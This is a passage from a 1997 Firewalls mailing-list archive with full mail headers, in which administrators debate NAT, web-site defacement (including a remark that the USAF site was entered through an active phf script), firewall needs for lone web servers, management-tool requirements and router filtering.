>---------- >From: Carl Karlsson[SMTP:ckn@findata.se] >Sent: Friday, January 03, 1997 11:43 AM >To: 'Firewalls Mailing List' >Subject: RE: NT NAT > > >On Fri, 3 Jan 1997, Russ wrote: > >> You got anything intelligent to say on just why you think NAT offers ANY >> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. > >I'd like to know if and why this means that masquerading one's network >behind a 'secured' host doesn't provide any added security from just >connecting the network straight out? Or am I missing something here (not >unusual :)? >I was under the impression that if I use some box (Linux with TIS fwtk for >example, or that NT box perhaps?) masquerading my network and using >192.168.x.x-addresses inside, I would be at least a little bit more secure >than if had all my w95/nt/unix machines directly connected to the >internet? A hacker will know if those machines are there or not... Most people who don't know too much about the net wouldn't think anything of there possibly being more machines behind the firewall... however, hackers will.. I suppose you could toss this under the 'security through obscurity' theme, but.... time has taught us that doesn't work. Hackers are very curious beings and will find just about anything, no matter how well you think you've hidden it. Machines that are masqueraded? That's nothing. The people that wouldn't even think about anything being hidden that way wouldn't be able to hack the machines anyway. That's my opinion anyhow, and I'll stick to it. >(Not talking super-secure here, not flaming anyone, but just interested! >Pointers do nicely if this is already well-known...) No, not talking super secure.... but that's the type of security that the only people that would be fooled wouldn't know how to hack those hidden machines anyway. From firewalls-owner Tue Jan 7 13:10:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05838 for firewalls-outgoing; Tue, 7 Jan 1997 12:15:15 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA05831 for ; Tue, 7 Jan 1997 12:15:06 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA29320; Tue, 7 Jan 1997 15:14:00 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA27798; Tue, 7 Jan 1997 15:13:54 -0500 (EST) Date: Tue, 7 Jan 1997 15:13:54 -0500 (EST) Message-Id: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, oconnor@reston.ans.net Subject: Re: Web Site Hacking Cc: Steve@hon.com, eric@nova.dcrt.nih.gov Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Today's Washington Post had a brief article regarding the ForceField product >from TIS which is apparently intended to address this issue. Unfortunately >you have to register to find out anything specific about the package, e.g. >which OS it replaces/augments. They do tell you the price however :-). I've >registered but the implication is that the more specific information will >be sent surface mail. According to the TIS Web page on Gauntlet ForceField ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html ) if you register they will give you a free evaluation copy of the software available in January. - Morrow From firewalls-owner Tue Jan 7 13:18:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06434 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:53 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06424 for ; Tue, 7 Jan 1997 12:30:24 -0800 (PST) Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23604; Tue, 7 Jan 1997 21:30:06 +0100 Message-Id: X-Mailer: XFMail 1.0 [p0] on Linux Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Mime-Version: 1.0 In-Reply-To: <199612312101.NAA17474@miles.greatcircle.com> Date: Mon, 06 Jan 1997 16:53:57 +0100 (MET) Organization: ENTE NAZIONALE DI DERATTIZZAZIONE From: Andrea Ferraris To: uskanbye@ibmmail.com Subject: Re: Air Force Web Site Hacked Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I have not set one up yet(Planned for July), but I believe you can have >a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >and all data on CDROM so you would not have any writable media. You could use - maybe - Linux from Caldera too. Some months ago, they worked on booting systems from CDROM with Adaptec 2940 controllers. But I can't figure out what can be the use of a diskless server. I think also that you must get more RAM because the lack of disk space where swapping . In any case You shouldn't take in most consideration my thoughts because I'm not an expert. Regards, Andrea ---------------------------------- E-Maill: Andrea Ferraris Date: 06-Jan-97 Time: 16:53:57 This message was sent by XFMail ---------------------------------- From firewalls-owner Tue Jan 7 13:22:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06433 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:49 -0800 (PST) Received: from pecos-int.iphase.com (pecos.iphase.com [157.175.3.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06416 for ; Tue, 7 Jan 1997 12:30:21 -0800 (PST) Received: by pecos-int.iphase.com; id AA04950; Tue, 7 Jan 97 14:30:03 CST Received: from rio.iphase.com(157.175.2.200) by pecos.iphase.com via smap (3.2) id xma004947; Tue, 7 Jan 97 14:29:58 -0600 Received: by rio.iphase.com; id AA20501; Tue, 7 Jan 97 14:29:56 CST Received: from chip (chip-fddi.iphase.com) by que.iphase.com.iphase.com (4.1/SMI-4.1) id AA06653; Tue, 7 Jan 97 14:29:55 CST Message-Id: <32D2B242.167EB0E7@iphase.com> Date: Tue, 07 Jan 1997 14:29:54 -0600 From: Patrick Larkin Jr Organization: Interphase Corporation X-Mailer: Mozilla 3.0 (X11; I; SunOS 4.1.3 sun4c) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: [Fwd: Re: Web Site Hacking] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve wrote: > > Eric K. Dickinson wrote: > > > > I am wondering if this is a suitable solution. Could one not set up a passive > > defence by over writing the presented home-pages at a predeterminded time and > > at some other trigger such as a write or copy. Any unauthorized action could > > also be used as a trigger to just "over write". The real home-page coud be > > anywhere accessable only by the OS itself or another hardened location not > > presented to the world. I am used to the Unix world and have more experience > > there than NT. > > > > Any Ideas? Thoughts? Or is this out in let field? > > > > eric@nova.dcrt.nih.gov > > Eric, > > A very interesting thought..but firewalls are supposed to prevent users > from being able to tamper in the first place. But, I for one am going > to give that more serious consideration as I see its possibilities for > use on maybe another machine on the LAN to check on the status of say a > web server. Thanks for the idea.. > > Steve > Steve@hon.com > sdg consulting 2 things: 1. I disagree with the statement about firewalls.... some find it more palatable to put the web server OUTSIDE the firewall and not let ANYONE through 2. the idea of re-writing the files regularly on the web server is a good one.... we do something similar to 'rdist's binary compare and unconditionally re-write that which differes from the "master" copy stored well within our security perimeter. We also ascribe to 1 above and do NOT trust our web server in anyway.... if it's crashed, we know it quickly, restore from a recent backup, and go on with our lives. -- [~]========================================================================[~] | Patrick Larkin Jr. Systems Administrator | | Ah, but Unix IS a User Friendly OS! It's just picky about its friends! | [_]========================================================================[_] From firewalls-owner Tue Jan 7 13:27:47 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA07522 for firewalls-outgoing; Tue, 7 Jan 1997 12:58:39 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA07515 for ; Tue, 7 Jan 1997 12:58:29 -0800 (PST) Received: from elvis.vnet.net (elvis.vnet.net [166.82.1.5]) by ginger.vnet.net (8.8.2/8.8.2) with ESMTP id QAA18613 for ; Tue, 7 Jan 1997 16:05:48 -0500 Received: from sdg (galip.vnet.net [166.82.174.200]) by elvis.vnet.net (8.8.4/8.8.4) with SMTP id NAA20669 for ; Tue, 7 Jan 1997 13:15:10 -0500 (EST) Message-ID: <32D2913C.91E@hon.com> Date: Tue, 07 Jan 1997 13:12:49 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: To Firewall or Not to Firewall? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk HI, I have been viewing this list for several weeks now and it seems that the general consenus is that a firewall is needed in ALL cases. What I am wondering is what if the only connection to the Internet is a Website? And what if the WebSite software has its own built-in security such as O'Reiley's WebSite does? Is a firewall _still_ necessary? Thanks for any responses..I would hope that others would be wondering this also, not just myself, and any responses would benefit many. Steve Steve@hon.com sdg consulting From firewalls-owner Tue Jan 7 14:35:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA10449 for firewalls-outgoing; Tue, 7 Jan 1997 13:57:43 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA10442 for ; Tue, 7 Jan 1997 13:57:32 -0800 (PST) Received: by hidata.com; id AA29310; Tue, 7 Jan 97 13:57:15 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma029308; Tue, 7 Jan 97 13:57:08 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFCA2.8B7D3240@oscntsrv.hidata.com>; Tue, 7 Jan 1997 13:56:13 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: Multi-FW Gateway management GUI Date: Tue, 7 Jan 1997 13:56:12 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm collecting basic requirements for FW-farm management applications for an internal instructional document. What I've thought of so far is the following: 1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states. 2. The ability to select a proxy and view configuration information on that proxy on a specific gateway. 3. The ability to delegate departmental security. 4. The ability to manage individual user authentication per proxy. 5. The ability to centrally view logs. 6. The ability to send pages on specific events. 7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring. 8. A sanity-check utility which looks for obvious proxy filter configuration errors. 9. A tripwire utility to display alerts on file and process state changes. 10. 'Courtney' for farms? 11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc). 12. Time synchronization verification for accurate log comparisons. 13. Strongly encrypted and authenticated administrative channels. 14. Load balancing? Comments? Which are overkill and which should I add? Bill Stout From firewalls-owner Tue Jan 7 16:32:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17938 for firewalls-outgoing; Tue, 7 Jan 1997 16:08:58 -0800 (PST) Received: from unix1.sysnet.net (unix1.sysnet.net [206.142.32.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA17890 for ; Tue, 7 Jan 1997 16:08:36 -0800 (PST) Received: from [206.142.16.35] (bppp1.sysnet.net [206.142.16.35]) by unix1.sysnet.net (8.8.4/8.6.12) with SMTP id UAA14304 for ; Tue, 7 Jan 1997 20:36:39 -0500 (EST) Message-Id: <199701080136.UAA14304@unix1.sysnet.net> Subject: USAF: how it was hacked Date: Tue, 7 Jan 97 19:09:39 -0400 x-sender: patton@mail.sysnet.net x-mailer: Claris Emailer 1.1 From: Matthew Patton To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk No, this isn't about cdrom based web content. Really quite anticlimatic. The infamous phf script was left active on the server and was how they got in. Root, the whole 9 yards. What's really funny is that no more than a week prior to the incident, I suggested to ASSIST (the military's equiv of CERT, and now financial sponsor of same) that in light of the minor poking around I did on a handful of military web sites, that they needed to get the word out to admins because so many servers were in a high state of misconfiguration and just waiting to be exploited. 7 days later, boom!! I'm not sure on what grounds people place so much trust in the military to do things right with respect to host and network security. I'm sure there are segments that do a damn fine job, but seeing the abject lack of skills and knowledge in the Pentagon area makes me a mite bit skeptical and not a little ashamed. It's a wonder we don't see high profile exploits on a routine basis. Don't get me wrong, the private sector doesn't have their act together on many fronts as well. Now hopefully the thread can die in peace. From firewalls-owner Tue Jan 7 17:29:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA22531 for firewalls-outgoing; Tue, 7 Jan 1997 17:10:01 -0800 (PST) Received: from mailsorter-1.alma.webtv.net (mailsorter-1.isp.alma.webtv.net [205.180.153.85]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA22524 for ; Tue, 7 Jan 1997 17:09:53 -0800 (PST) Received: from mailtod-1.alma.webtv.net (mailtod-1.iap.alma.webtv.net [207.76.180.81]) by mailsorter-1.alma.webtv.net (8.7.5/8.7.3) with ESMTP id RAA24170; Tue, 7 Jan 1997 17:09:32 -0800 (PST) Received: (from production@localhost) by mailtod-1.alma.webtv.net (8.7.5/8.7.3) id RAA28245; Tue, 7 Jan 1997 17:09:33 -0800 (PST) Message-Id: <199701080109.RAA28245@mailtod-1.alma.webtv.net> From: bigal1@webtv.net (Alfred Lipschitz) Date: Tue, 7 Jan 1997 20:09:33 -0500 To: firewalls@GreatCircle.COM Subject: New Party Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-Transfer-Encoding: 7BIT MIME-Version: 1.0 (WebTV 1.0) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk They contacted , when I respond I get garrabe back. Tell them to call me 609-264-0311.Thanks, I appreciate it. El Producto From firewalls-owner Tue Jan 7 17:53:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA23322 for firewalls-outgoing; Tue, 7 Jan 1997 17:23:23 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA23283 for ; Tue, 7 Jan 1997 17:22:58 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA26643; Wed, 8 Jan 1997 09:08:41 +0800 (SGT) Message-ID: <32D2F4C6.5DA5@ncs.com.sg> Date: Wed, 08 Jan 1997 09:13:42 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: Steve@hon.com CC: firewalls@GreatCircle.COM Subject: Re: To Firewall or Not to Firewall? References: <199701080101.JAA26202@elm.ncs.com.sg> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Steve once wrote: > > > > HI, > > > > I have been viewing this list for several weeks now and it seems that > > the general consenus is that a firewall is needed in ALL cases. What I > > am wondering is what if the only connection to the Internet is a > > Website? And what if the WebSite software has its own built-in security > > such as O'Reiley's WebSite does? Is a firewall _still_ necessary? > > Thanks for any responses..I would hope that others would be wondering > > this also, not just myself, and any responses would benefit many. > > > > Steve > > Steve@hon.com > > sdg consulting IMHO, a firewall is necessary as long as you are not running a standalone web server with sole access to the Internet. O'Reiley's WebSite is an application program running over a largely insecure OS platform that will still allow the purposeful prankster to ruin your show for a laugh. The word 'secure', as I looked at it, is history. Anything considered secured now is relative to the lack or gain of technology and information. And then there is the bugs...... Firewall may not be some screening that you will like, especially when the industry is oddly shifting to the WindowsNT platform. But it will still reduce the odds that a would-be hacker making curtain calls to your website/LAN and provides a misinformed peace of mind to your company's MIS. But if you don't like firewalls, try reducing the number of active ports to the minimal necessity, and delete a whole lot of interesting executables. Security in a networking environment, afterall, means inconveniences. -- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ ćććććććć Flames > /dev/null ćććććććć From firewalls-owner Tue Jan 7 18:35:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA27488 for firewalls-outgoing; Tue, 7 Jan 1997 18:14:35 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA27370 for firewalls@greatcircle.com; Tue, 7 Jan 1997 18:14:11 -0800 (PST) Received: from relay7.UU.NET by ascb.saturnm.rosmail.com with ESMTP id HAA23178; (8.8.4/vak/1.9) Tue, 7 Jan 1997 07:32:43 +0300 (MSK) Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxkk04152; Mon, 6 Jan 1997 23:30:40 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05177 for firewalls-outgoing; Mon, 6 Jan 1997 15:45:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA05158 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:44:49 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26523 for ; Fri, 3 Jan 1997 07:20:42 -0800 (PST) Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF957.1EE0F1B0@mtymail.avantel-icom.com.mx>; Fri, 3 Jan 1997 09:18:45 -0600 Message-ID: From: Ricardo Alvarado To: "firewalls@GreatCircle.COM" Subject: Re: internal filtering router - filter config? Date: Fri, 3 Jan 1997 09:20:46 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What type of things would you filter on the internal router? or even >the external router? I am going to be installing a firewall real soon >and would really appreciate any help. > >-steve. >matkoski@dreamscape.com In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses, as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, andl leave just mail, web, ftp, etc. ricardo ralvarado@avantel.com.mx From firewalls-owner Tue Jan 7 18:40:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA28048 for firewalls-outgoing; Tue, 7 Jan 1997 18:20:20 -0800 (PST) Received: from gargoyle.clark.net (pa1dsp14.dcwt.infi.net [208.136.65.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA28020 for ; Tue, 7 Jan 1997 18:20:05 -0800 (PST) Received: by gargoyle.clark.net (Smail3.1.29.1 #2) id m0vhneH-000EzZC; Tue, 7 Jan 97 21:21 EST Date: Tue, 7 Jan 1997 21:21:49 -0500 (EST) From: "Paul D. Robertson" X-Sender: proberts@gargoyle To: Wilner@DOCKMASTER.NCSC.MIL cc: firewalls@GreatCircle.COM Subject: Re: Re: NCSA != NCSC In-Reply-To: <970107195334.971794@DOCKMASTER.NCSC.MIL> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997 Wilner@DOCKMASTER.NCSC.MIL wrote: > Everything except boot-up depends upon the O/S. Nothing is below the "O/S > layer," nor does one speak of such a layer unless one intends "application Hrm, I'd always considered monitor PROMs to be 'below' the OS since it's unaware of the PROM code runing, has no control of the machine at that point, is still loaded in memory, and can be manipulated without it's own consent. Hardware debuggers have also always fallen in this category, in my view. Depending on the OS, there can be software, hardware, or firmware memory management operating "under" the OS, especially if that OS is running in a virtual machine, or some other bounded "sandbox", "the OS" doesn't always mean "the *only* OS". > layer" and doesn't know an application from an O/S, nor can a single byte be > sent or retrieved over a device (networked or otherwise) unless an O/S is > relied upon, nor can a single access to memory, disk, or what-have-you be Hmm, that's funny, the PROMs in my Suns seem quite happy to access the console device without Solaris'/SunOS' knowledge. MVS also seemed quite happy running under VM last time I did it, and the controlling OS in the 'OS' stack seemed quite happy to go right up against the real and virtual devices without MVS' say so. Certainly from an MVS applications standpoint things were running 'below' the OS. > performed by networking code "below the O/S layer," as we so quaintly say, > if there is no O/S involved. And many OS' rely on firmware code layered beneath them to access the actual devices. No reason you couldn't do the same for CPU, masking the OS, and it's applications to some subset of the machine, and enforcing memory, instruction, or device protection. > Gentlemen, if this represents your understanding of operating systems and > security, please contribute to alt.brush-sellers, not to firewalls. Care for a broom to ride out on? Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Tue Jan 7 19:44:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03463 for firewalls-outgoing; Tue, 7 Jan 1997 19:33:55 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03428 for ; Tue, 7 Jan 1997 19:33:34 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08753; Tue, 7 Jan 1997 19:33:13 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06972; Wed, 8 Jan 1997 11:36:44 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10173; Wed, 8 Jan 1997 11:29:56 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07851; Wed, 8 Jan 1997 11:34:24 +0800 Date: Wed, 8 Jan 1997 11:34:24 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080334.LAA07851@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From julie.gupta@Eng Tue Jan 7 02:50:29 1997 Date: Mon, 6 Jan 1997 10:56:25 -0800 From: julie.gupta@Eng (Julie Gupta) To: David.Wee@Singapore Subject: Re: FW-1 throughput? Etc. Cc: elizabeth.purcell@Eng David, As for the second question, FW-1 2.1 does have a VPN add-on module. Please check the pricelist. SunScreen EFS is also a software solution that provides VPN capability. There is a positioning document on the web on when to use one over the other. They are competitive products. Hope this helps, Julie > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. > > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilties of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc. > > > ----- End Included Message ----- > > ----- End Included Message ----- From firewalls-owner Tue Jan 7 19:48:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01790 for firewalls-outgoing; Tue, 7 Jan 1997 19:09:19 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01728 for ; Tue, 7 Jan 1997 19:08:24 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vhoMt-0004FbC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:07:55 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 8 Jan 97 04:07 MET Received: by lina id m0vhoJh-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:04:37 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: To Firewall or Not to Firewall? To: Steve@hon.com Date: Wed, 8 Jan 1997 04:04:36 +0100 (MET) Cc: firewalls@GreatCircle.COM In-Reply-To: <32D2913C.91E@hon.com> from "Steve" at Jan 7, 97 01:12:49 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > I have been viewing this list for several weeks now and it seems that > the general consenus is that a firewall is needed in ALL cases. Not realy. > What I > am wondering is what if the only connection to the Internet is a > Website? Its safe enough to place a packet filter in front of the server (in your ISP access router). But it is then important that there is no net connection to internal hosts. This means all html files need to be uploaded by disk, locally edited or via the net (if you are so daring to allow that method). You will very fast need to connect you bureaulan to the web server, or to the internet for WWW Surfing. Then you might consider using a firewall or a statefull NAT Box with outgoing only connections. Greetings Bernd From firewalls-owner Tue Jan 7 19:59:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03387 for firewalls-outgoing; Tue, 7 Jan 1997 19:32:45 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03377 for ; Tue, 7 Jan 1997 19:32:33 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08433; Tue, 7 Jan 1997 19:31:49 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06942; Wed, 8 Jan 1997 11:35:18 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10155; Wed, 8 Jan 1997 11:28:31 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07848; Wed, 8 Jan 1997 11:32:59 +0800 Date: Wed, 8 Jan 1997 11:32:59 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080332.LAA07848@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From elizabeth.purcell@Eng Tue Jan 7 04:10:59 1997 Date: Mon, 6 Jan 1997 12:10:23 -0800 From: elizabeth.purcell@Eng (Elizabeth Purcell) Subject: Re: FW-1 throughput? Etc. Cc: julie.gupta@Eng, elizabeth.purcell@Eng To: David.Wee@Singapore Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-MD5: WJzJXeXl2piZpiPHTTfjYQ== David, I have firewall throughput information at the url http://netrai4.eng/firewall/firewall.results.new.html. The results were measured on an Ultra 2/2170 with SunSwift network adaptors (100BaseT) at half duplex. Notice that the cpu utilization for the workstations with the firewalls installed did not come close to saturation. Looking at the SPEC95 info at the url, http://perfwww.eng/tasks/results/spec95, a ss20/71 is about half the cpu performance of a Ultra 2/2170. Hope that this helps. Let me know.. Elizabeth > From gupta@gupta Mon Jan 6 10:49:57 1997 > Date: Mon, 6 Jan 1997 10:56:25 -0800 > From: gupta@gupta (Julie Gupta) > To: David.Wee@Singapore > Subject: Re: FW-1 throughput? Etc. > Cc: elizabeth.purcell@Eng > > Elizabeth, > > Can you help David with his first question? > > Thanks. > > ------------------------------------------- > David, > > As for the second question, FW-1 2.1 does have a VPN add-on module. > Please check the pricelist. SunScreen EFS is also a software solution > that provides VPN capability. There is a positioning document on the > web on when to use one over the other. They are competitive products. > > Hope this helps, > Julie > > > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > > Date: Mon, 6 Jan 1997 15:53:50 +0800 > > From: David.Wee@Singapore (David Wee) > > To: julie.gupta@Corp > > Subject: FW-1 throughput? Etc. > > Cc: David.Wee@Singapore > > > > Julie, > > > > > > Can you please help answer 1 & 2 > > > > > > Regards,david > > ----- Begin Included Message ----- > > > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > > Date: Mon, 6 Jan 1997 15:46:44 -0800 > > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > > To: firewalls@greatcircle.com, dwee@Singapore > > Subject: FW-1 throughput? Etc. > > > > Hello world, > > > > I would be very much obliged if anybody can please answer on this: > > > > 1] How many packets per second can the Solstice Firewall-1 2.1 > > (installed in a Sun Sparcstation 20 with Solaris 2.5) > > process ? In mbps terms? > > 2] Current needs dictate for a solution involving FWs with multiple > > secure VPNs to mobile customers. I like the capabilties of > > FW-1 2.1 very much but I understand that it does not support VPN > > today. Do I need the SunScreen to complement it? :-( > > 3] Who do I 